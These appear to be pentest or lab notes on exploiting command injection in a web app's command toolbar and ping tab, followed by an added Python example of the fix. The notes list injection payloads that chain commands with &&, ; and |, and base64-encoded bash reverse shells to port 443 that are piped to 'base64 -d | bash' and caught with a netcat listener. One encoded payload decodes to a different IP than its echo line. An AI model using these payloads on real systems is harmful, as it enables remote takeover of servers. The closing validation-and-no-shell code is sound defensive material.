Toolbar that allows running commands on the target

[1] If nothing happens, try to inspect element and change the method from "GET" to "POST"

[2] echo a revshell and encode it in base64

echo "bash -i >& /dev/tcp/192.168.101.53/443 0>&1" | base64 > shell.txt

start a netcat listener on kali, port 443

#Inject this string in the toolbar; it decodes the base64-encoded revshell on the target and triggers a shell on port 443

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bash

[3] Tab that lets you run ping commands

Try using double ampersand to run commands

127.0.0.1 && whoami

127.0.0.1 && cat /etc/hosts

#Variation: use a semicolon before the command

;id

;whoami

;cat /etc/hosts

#Variation: use | pipe command to get RCE

127.0.0.1 | id

Revshell:

echo "bash -i >&/dev/tcp/192.168.54.200/443 0>&1" | base64 > shell.txt

cat shell.txt

nc -nvlp 443

127.0.0.1 | echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguNTQuMjAwLzQ0MyAwPiYxCg== | base64 -d | bash
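
Why the ping tab in [3] is injectable, and the fix to recommend in the report: an added example, not code from the original notes. The handler and function names are hypothetical, and the sample inputs are constructed from the payload shapes listed above.

```python
import ipaddress
import subprocess

# Constructed sample inputs: two benign values plus the ping-tab payload shapes above.
SAMPLES = ["127.0.0.1", "10.0.0.5", "127.0.0.1 && whoami", ";id", "127.0.0.1 | id"]


def vulnerable_command(host):
    """The injectable pattern: user input is pasted into a string that a shell
    later parses, so &&, ; and | each start a new command."""
    return "ping -c 1 " + host  # would be run with shell=True


def safe_ping_argv(host):
    """Return an argv list for ping, or raise ValueError.

    Two independent controls:
      1. Allow-list validation: the value must parse as one IP address literal.
      2. No shell: the list is handed to exec directly, so metacharacters
         have no meaning even if validation were bypassed.
    """
    addr = ipaddress.ip_address(host.strip())  # ValueError on anything else
    return ["ping", "-c", "1", str(addr)]


def run_ping(host, timeout=5.0):
    """Hypothetical handler body: execute ping without a shell."""
    argv = safe_ping_argv(host)
    done = subprocess.run(argv, shell=False, timeout=timeout, capture_output=True)
    return done.returncode


def classify(samples):
    """Map each sample to 'accepted' or 'rejected' without executing anything."""
    verdicts = {}
    for value in samples:
        try:
            safe_ping_argv(value)
            verdicts[value] = "accepted"
        except ValueError:
            verdicts[value] = "rejected"
    return verdicts


if __name__ == "__main__":
    for value, verdict in classify(SAMPLES).items():
        print(f"{verdict:8}  {value!r}")
```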
